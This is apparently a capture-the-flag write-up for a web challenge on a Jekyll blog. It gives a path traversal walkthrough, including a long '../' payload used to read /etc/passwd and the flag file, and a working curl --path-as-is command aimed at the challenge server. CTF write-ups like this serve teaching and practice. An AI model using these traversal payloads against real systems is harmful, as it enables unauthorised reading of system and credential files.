Tags: web file_path_traversal
Rating: 1.5
```
I prefer Jekyll for building my blog. Please try to read /home/web/flags/flag1.txt.
[http://34.82.101.212:8001] (down)
[http://59.124.168.42:8001]
```
```
After scanning the website i found that we can use the exploit of "File path traversal" from two links:
1st link: [http://34.82.101.212:8001/feed.xml]
2nd link: [http://34.82.101.212:8001/hope/2019/12/19/welcome-to-jekyll.html]
And then you just inject the path ../../../../../../../../../../../../../../../../etc/passwd and you will get the content of file.
And now we just changet [/etc/passwd] with [/home/web/flags/flag1.txt]
Bingooo you get the flag.
```
I would use Burp suite for scanning and exploiting this vuln
The browser strips out the relative paths ../
You can see the same thing happening when running curl --verbose.
But this works:
curl --path-as-is http://34.82.101.212:8001/../../../../../../../../../../home/web/flags/flag1.txt
Took me a while to figure this out, hope it helps someone :)
